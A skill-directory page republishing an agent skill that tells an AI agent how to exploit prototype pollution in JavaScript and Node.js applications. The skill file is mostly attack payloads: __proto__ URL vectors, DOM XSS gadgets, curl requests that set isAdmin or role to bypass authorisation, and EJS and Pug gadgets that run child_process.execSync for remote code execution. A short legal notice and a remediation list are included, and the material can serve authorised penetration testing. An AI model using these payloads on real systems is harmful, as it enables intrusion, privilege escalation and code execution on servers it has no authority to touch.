Agent skill

Exploiting Prototype Pollution In Javascript

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Detects and exploits JavaScript prototype pollution vulnerabilities in client-side and server-side (Node.js) applications to achieve XSS, RCE, or authentication bypass through property injection…

Apache-2.0Auto-check passedSecurity

Install Exploiting Prototype Pollution In Javascript

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-prototype-pollution-in-javascript -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-prototype-pollution-in-javascript --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploiting-prototype-pollution-in-javascript .claude/skills/exploiting-prototype-pollution-in-javascript && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
exploiting-prototype-pollution-in-javascript
GitHub stars
34k
Token cost
~2.3k tokens
SKILL.md length
406 words
Files
4 (incl. scripts, references)
Skills in repo
639
Repo updated
First seen
Licence
Apache-2.0

At a glance

Detects and exploits JavaScript prototype pollution vulnerabilities in client-side and server-side (Node.js) applications to achieve XSS, RCE, or authentication bypass through property injection…

  • Works in 6 steps: Identify Prototype Pollution Sources → Test Server-Side Prototype Pollution → Exploit Client-Side for DOM XSS → …
  • Assessing a JavaScript/Node.js application for prototype pollution
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder; calls curl

What it does

Exploiting Prototype Pollution In Javascript is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Detects and exploits JavaScript prototype pollution vulnerabilities in client-side and server-side (Node.js) applications to achieve XSS, RCE, or authentication bypass through property injection into Object.prototype. Use when assessing a JavaScript/Node.js application for prototype pollution, especially where a merge, clone, or extend function accepts user-controlled keys.

Its SKILL.md is about 2.3k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Security, covering Backend development, Web application vulnerabilities and Authentication. It works with JavaScript and Node.js. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Assessing a JavaScript/Node.js application for prototype pollution
  • Especially where a merge
  • Extend function accepts user-controlled keys

Example prompts

  • “Use the exploiting-prototype-pollution-in-javascript skill to detect and exploits JavaScript prototype pollution vulnerabilities in client-side and…”
  • “/exploiting-prototype-pollution-in-javascript”

Requirements

  • Python 3
  • Node.js

Workflow steps

6 steps, taken from the step headings in SKILL.md.

  1. Identify Prototype Pollution Sources
  2. Test Server-Side Prototype Pollution
  3. Exploit Client-Side for DOM XSS
  4. Exploit Server-Side for RCE
  5. Exploit for Authentication and Authorization Bypass
  6. Detect with Automated Tools

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Exploiting Prototype Pollution In Javascript loads about 2.3k tokens when it runs, and up to ~3k if it reads all its reference files. Until then it costs about 105 tokens; SKILL.md has 406 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~105
When it runs · the whole SKILL.md, loaded when a task matches
~2.3k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 406 words, ~2,342 tokens.

Download SKILL.mdSave it as .claude/skills/exploiting-prototype-pollution-in-javascript/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
exploiting-prototype-pollution-in-javascript
description
Detects and exploits JavaScript prototype pollution vulnerabilities in client-side and server-side (Node.js) applications to achieve XSS, RCE, or authentication bypass through property injection into Object.prototype. Use when assessing a JavaScript/Node.js application for prototype pollution, especially where a merge, clone, or extend function accepts user-controlled keys.
domain
cybersecurity
subdomain
web-application-security
tags
prototype-pollution, javascript, node-js, xss, rce, property-injection, dom-xss, server-side-pollution
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.PS-01, ID.RA-01, PR.DS-10, DE.CM-01
mitre_attack
T1190, T1059.007, T1505.003, T1083, T1055

Exploiting Prototype Pollution in JavaScript

When to Use

  • When testing Node.js or JavaScript-heavy web applications
  • During assessment of APIs accepting deep-merged JSON objects
  • When testing client-side JavaScript frameworks for DOM XSS via prototype pollution
  • During code review of object merge/clone/extend operations
  • When evaluating npm packages for prototype pollution gadgets

Prerequisites

  • Burp Suite with DOM Invader extension for client-side prototype pollution detection
  • Node.js development environment for server-side testing
  • Understanding of JavaScript prototype chain and object inheritance
  • Knowledge of common pollution gadgets (sources, sinks, and exploitable properties)
  • Prototype Pollution Gadgets Scanner Burp extension for server-side detection
  • Browser developer console for client-side prototype manipulation

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Workflow

Step 1 — Identify Prototype Pollution Sources
javascript
// Client-side: Test URL-based sources
// Navigate to: http://target.com/page?__proto__[polluted]=true
// Or use constructor: http://target.com/page?constructor[prototype][polluted]=true

// Check in browser console:
console.log(({}).polluted); // If returns "true", pollution confirmed

// Common URL-based pollution vectors:
// ?__proto__[key]=value
// ?__proto__.key=value
// ?constructor[prototype][key]=value
// ?constructor.prototype.key=value

// Hash fragment pollution:
// http://target.com/#__proto__[key]=value
Step 2 — Test Server-Side Prototype Pollution
bash
# Test via JSON body with __proto__
curl -X POST http://target.com/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"isAdmin": true}}'

# Test via constructor.prototype
curl -X POST http://target.com/api/update \
  -H "Content-Type: application/json" \
  -d '{"constructor": {"prototype": {"isAdmin": true}}}'

# Test for status code reflection (detection technique)
# Pollute status property to detect server-side pollution
curl -X POST http://target.com/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"status": 510}}'
# If response returns 510, server-side pollution confirmed

# JSON content type pollution
curl -X POST http://target.com/api/settings \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"shell": "/proc/self/exe", "NODE_OPTIONS": "--require /proc/self/environ"}}'
Step 3 — Exploit Client-Side for DOM XSS
javascript
// Step 1: Find pollution source (URL parameter, JSON input, postMessage)
// Step 2: Find a gadget - a property read from prototype that reaches a sink

// Common gadgets for DOM XSS:
// innerHTML gadget:
// ?__proto__[innerHTML]=<img/src/onerror=alert(1)>

// jQuery $.html() gadget:
// ?__proto__[html]=<img/src/onerror=alert(1)>

// transport URL gadget (common in analytics scripts):
// ?__proto__[transport_url]=data:,alert(1)//

// Sanitizer bypass via prototype pollution:
// ?__proto__[allowedTags]=<script>
// ?__proto__[tagName]=IMG

// Use DOM Invader (Burp Suite built-in):
// 1. Enable DOM Invader in Burp's embedded browser
// 2. Enable Prototype Pollution option
// 3. Browse application - DOM Invader auto-detects sources
// 4. Click "Scan for gadgets" to find exploitable sinks
Step 4 — Exploit Server-Side for RCE
bash
# Node.js child_process gadget (RCE)
# If application calls child_process.execSync(), spawn(), or fork():
curl -X POST http://target.com/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"shell": "node", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'

# EJS template engine gadget
curl -X POST http://target.com/api/update \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"client": true, "escapeFunction": "JSON.stringify; process.mainModule.require(\"child_process\").execSync(\"id\")"}}'

# Handlebars template gadget
curl -X POST http://target.com/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"allowProtoMethodsByDefault": true, "allowProtoPropertiesByDefault": true}}'

# Pug template engine gadget
curl -X POST http://target.com/api/data \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"block": {"type": "Text", "line": "process.mainModule.require(\"child_process\").execSync(\"id\")"}}}'
Step 5 — Exploit for Authentication and Authorization Bypass
bash
# Pollute isAdmin or role property
curl -X POST http://target.com/api/profile \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"isAdmin": true, "role": "admin"}}'

# Pollute auth-related properties
curl -X POST http://target.com/api/settings \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"verified": true, "emailVerified": true}}'

# Bypass JSON schema validation
curl -X POST http://target.com/api/data \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"additionalProperties": true}}'
Step 6 — Detect with Automated Tools
bash
# Use ppfuzz for automated detection
ppfuzz -l urls.txt -o results.txt

# Nuclei templates for prototype pollution
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/prototype-pollution.yaml

# Server-side detection with Burp Scanner
# Enable "Server-side prototype pollution" scan check
# Review issues in Burp Dashboard

# Manual detection via timing/error-based techniques
# Pollute a property that causes detectable server behavior change
curl -X POST http://target.com/api/data \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"toString": "polluted"}}'
# If server errors (500), pollution is working

Key Concepts

ConceptDescription
Prototype ChainJavaScript inheritance mechanism where objects inherit from Object.prototype
protoAccessor property that exposes the prototype of an object
Pollution SourceInput point that allows setting properties on Object.prototype
Pollution SinkCode that reads a polluted property and performs a dangerous operation
GadgetA property that flows from prototype to a dangerous sink (source-to-sink chain)
Deep MergeRecursive object merge functions that may process proto as a regular key
constructor.prototypeAlternative path to access and pollute the prototype object
Show full SKILL.md (146 more words)Show less

Tools & Systems

ToolPurpose
DOM InvaderBurp Suite built-in tool for detecting client-side prototype pollution
Prototype Pollution Gadgets ScannerBurp extension for server-side gadget detection
ppfuzzAutomated prototype pollution fuzzer
NucleiTemplate-based scanner with prototype pollution templates
server-side-prototype-pollutionBurp Scanner check for server-side detection
ESLint security pluginStatic analysis for prototype pollution patterns in code

Common Scenarios

  1. DOM XSS via Analytics — Pollute transport_url property to inject JavaScript through analytics tracking scripts that read URL from prototype
  2. RCE via Template Engine — Exploit EJS/Pug/Handlebars gadgets to execute arbitrary commands through polluted template rendering properties
  3. Admin Privilege Escalation — Pollute isAdmin or role properties to bypass authorization checks in Node.js applications
  4. JSON Schema Bypass — Pollute schema validation properties to bypass input validation and inject malicious data
  5. Denial of Service — Pollute toString or valueOf to crash the application when objects are coerced to primitives

Output Format

## Prototype Pollution Assessment Report
- **Target**: http://target.com
- **Type**: Server-Side Prototype Pollution
- **Impact**: Remote Code Execution via EJS template gadget

### Findings
| # | Source | Gadget | Sink | Impact |
|---|--------|--------|------|--------|
| 1 | POST /api/merge __proto__ | EJS escapeFunction | Template render | RCE |
| 2 | POST /api/profile __proto__ | isAdmin property | Auth middleware | Privilege Escalation |
| 3 | URL ?__proto__[innerHTML] | innerHTML property | DOM write | Client-Side XSS |

### Remediation
- Use Object.create(null) for configuration objects instead of {}
- Freeze Object.prototype with Object.freeze(Object.prototype)
- Sanitize __proto__ and constructor keys in user input
- Use Map instead of plain objects for user-controlled data
- Update vulnerable npm packages (lodash, merge-deep, etc.)

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/exploiting-prototype-pollution-in-javascript of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Exploiting Prototype Pollution In Javascript next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Exploiting Prototype Pollution In Javascript compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Exploiting Prototype Pollution In Javascript this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.3kAutomated safety check: PassApache-2.0
Token Storage Securitythedaviddias/Front-End-Checklist74k—~604Automated safety check: PassMIT
Security Verification Gatefengshao1227/ccg-workflow5.9k—~621Automated safety check: NotesMIT
Django Securityaffaan-m/ECC274k5 repos~4kAutomated safety check: NotesMIT
Django Securityaffaan-m/ECC274k1 repos~4.3kAutomated safety check: NotesMIT
Web Ssrfs0ld13rr/pentestcode817—~660Automated safety check: WarnMIT

Similar skills

  • Token Storage Security

    thedaviddias/Front-End-Checklist

    A skill your agent uses when reviewing authentication implementation, setting up a new auth system, or evaluating whether the current token storage approach exposes the application to XSS-based…

    74k GitHub stars~604 tokensUpdated yesterday
    SecurityAuto-check passed
  • Security Verification Gate

    fengshao1227/ccg-workflow

    Scans code with a bundled Node script for injection, secrets, XSS and other risky patterns, ranks findings by severity and checks that security decisions are documented.

    5.9k GitHub stars~621 tokensUpdated 22 days ago
    SecurityAuto-check: notes
  • Django Security

    affaan-m/ECC

    Django security best practices, authentication, authorization, CSRF protection, SQL injection prevention, XSS prevention, and secure deployment configurations.

    274k GitHub starsUsed in 5 repos~4k tokens
    Backend & APIsAuto-check: notes
  • Django Security

    affaan-m/ECC

    Django security best practices, authentication, authorization, CSRF protection, SQL injection prevention, XSS prevention, and secure deployment configurations.

    274k GitHub starsUsed in 1 repo~4.3k tokens
    Backend & APIsAuto-check: notes
  • Web Ssrf

    s0ld13rr/pentestcode

    Server-Side Request Forgery detection→internal-access→proof for web apps.

    817 GitHub stars~660 tokensUpdated 5 days ago
    Backend & APIsAuto-check: warnings
  • Typescript Security Review

    giuseppe-trisciuoglio/developer-kit

    Provides security review capability for TypeScript/Node.js applications, validates code against XSS, injection, CSRF, JWT/OAuth2 flaws, dependency CVEs, and secrets exposure.

    355 GitHub stars~2.4k tokensUpdated 27 days ago
    SecurityAuto-check: notes

More from mukul975/Anthropic-Cybersecurity-Skills

All 639 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Questions about Exploiting Prototype Pollution In Javascript

What does Exploiting Prototype Pollution In Javascript do?

Detects and exploits JavaScript prototype pollution vulnerabilities in client-side and server-side (Node.js) applications to achieve XSS, RCE, or authentication bypass through property injection…. Exploiting Prototype Pollution In Javascript is an agent skill from mukul975/Anthropic-Cybersecurity-Skills.prototype.

When should I use Exploiting Prototype Pollution In Javascript?

Exploiting Prototype Pollution In Javascript fits situations like: assessing a JavaScript/Node.js application for prototype pollution; especially where a merge; extend function accepts user-controlled keys.

How do I install Exploiting Prototype Pollution In Javascript in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-prototype-pollution-in-javascript -a claude-code`. Or copy the skill folder (skills/exploiting-prototype-pollution-in-javascript in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/exploiting-prototype-pollution-in-javascript in your project. Claude Code loads it when a task matches its description.

How do I install Exploiting Prototype Pollution In Javascript in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-prototype-pollution-in-javascript -a codex`. Or copy the skill folder (skills/exploiting-prototype-pollution-in-javascript in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/exploiting-prototype-pollution-in-javascript in your project. Codex loads it when a task matches its description.

Can I use Exploiting Prototype Pollution In Javascript in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-prototype-pollution-in-javascript -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploiting-prototype-pollution-in-javascript, .gemini/skills/exploiting-prototype-pollution-in-javascript, .github/skills/exploiting-prototype-pollution-in-javascript and .opencode/skills/exploiting-prototype-pollution-in-javascript in your project.

What does Exploiting Prototype Pollution In Javascript need to run?

Going by SKILL.md and its folder, Exploiting Prototype Pollution In Javascript needs Python for the scripts in its folder and the command-line tools its instructions call (curl). Our summary lists: Python 3; Node.js.

Does Exploiting Prototype Pollution In Javascript access the network?

SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.

Is Exploiting Prototype Pollution In Javascript safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Exploiting Prototype Pollution In Javascript use?

Exploiting Prototype Pollution In Javascript is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Exploiting Prototype Pollution In Javascript use?

About 2.3k tokens (SKILL.md is roughly 9.4k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 620 tokens, read only when the agent opens those files.

What are the alternatives to Exploiting Prototype Pollution In Javascript?

Skills that share tags, products or a category with Exploiting Prototype Pollution In Javascript: Token Storage Security (thedaviddias/Front-End-Checklist, 74k stars), Security Verification Gate (fengshao1227/ccg-workflow, 5.9k stars), Django Security (affaan-m/ECC, 274k stars) and Django Security (affaan-m/ECC, 274k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Exploiting Prototype Pollution In Javascript?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,870 GitHub stars. The repository holds 639 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.